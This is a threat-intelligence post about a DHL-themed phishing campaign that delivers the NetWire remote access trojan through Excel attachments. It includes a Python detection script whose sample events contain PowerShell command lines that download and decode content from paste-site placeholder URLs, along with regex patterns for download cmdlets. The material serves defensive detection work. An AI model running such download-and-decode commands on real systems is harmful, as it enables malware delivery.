NetWire is a publicly available Remote Access Trojan that is part of the NetWiredRC malware family, used by cybercriminals since 2012. Its primary functionality is credential stealing and keylogging, but it also has remote control capabilities. Adversaries often distribute NetWire through malspam and phishing emails.
In a recent campaign, cybercriminals targeted users in Germany with phishing emails disguised as messages from DHL, the German courier, parcel, and express mail service. The attackers used an MS Excel document as the malicious attachment. When opened, it runs a PowerShell command that downloads two files from Pastebin and performs character replacements on them to decode a DLL file, downloads the obfuscated NetWire RAT, and then uses the decoded DLL to inject the trojan into a legitimate process.
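As an added illustration (not part of the original post or of the SOC Prime rule), the following Python scores constructed Sysmon-style process-creation events for the chain described above: Office-spawned PowerShell, a paste-site URL, a download cmdlet, and string-replace decoding. Field names, the host list, the weights and the alert threshold are assumptions, and the sample command lines use placeholder URLs rather than real indicators.

```python
import re
from typing import Dict, List, Tuple

# Indicators drawn from the delivery chain described above. Field names assume
# Sysmon Event ID 1 (Image, ParentImage, CommandLine); weights are assumptions.
OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe")
PASTE_HOSTS = ("pastebin.com", "paste.ee")
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
DECODE_RE = re.compile(r"\.replace\(|-replace\b|frombase64string", re.I)

def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one process-creation event; anything that is not PowerShell scores 0."""
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    checks = [
        (parent.endswith(OFFICE_PARENTS), 2, "office-spawned powershell"),
        (any(h in cmd.lower() for h in PASTE_HOSTS), 2, "paste-site url"),
        (bool(DOWNLOAD_RE.search(cmd)), 1, "download cmdlet"),
        (bool(DECODE_RE.search(cmd)), 1, "string-replace decoding"),
    ]
    score = sum(weight for hit, weight, _ in checks if hit)
    reasons = [reason for hit, _, reason in checks if hit]
    return score, reasons

def hunt(events, threshold: int = 4):
    """Return [(event_id, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["id"], score, reasons))
    return hits

# Constructed sample events; the URLs and paste ids are placeholders, not real IoCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": EXCEL, "Image": PS, "CommandLine":
     "powershell -w hidden $d=(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER');$d.Replace('!','A')"},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine":
     "powershell Invoke-WebRequest https://updates.example.internal/patch.msi -OutFile patch.msi"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS, "CommandLine":
     "powershell (New-Object Net.WebClient).DownloadString('https://paste.ee/r/PLACEHOLDER') -replace 'x','0'"},
    {"id": 4, "ParentImage": EXCEL, "Image": PS, "CommandLine": "powershell -Command Get-Date"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)  # events 1 and 3 reach the threshold
```

Event 4 (Office launching PowerShell with a benign command) stays below the threshold on its own, which is the trade-off a scoring rule makes against the noisier single-indicator alert.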
A new threat hunting rule by Osman Demir uncovers the PowerShell command used to download the malicious files and the subsequent injection into a legitimate Windows process.
Netwire RAT via paste.ee and MS Excel – https://tdm.socprime.com/tdm/info/999rWf0zExpC/YyFoJ3IBjwDfaYjKeoqF/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, Logpoint, Humio
EDR: Windows Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Command and Control
Techniques: Remote Access Tools (T1219)
You can also check the community rule Netwire RAT detection via WScript: https://tdm.socprime.com/tdm/info/uI7Og7wR6TUZ/SDkzRW4BLQqskxffI-01/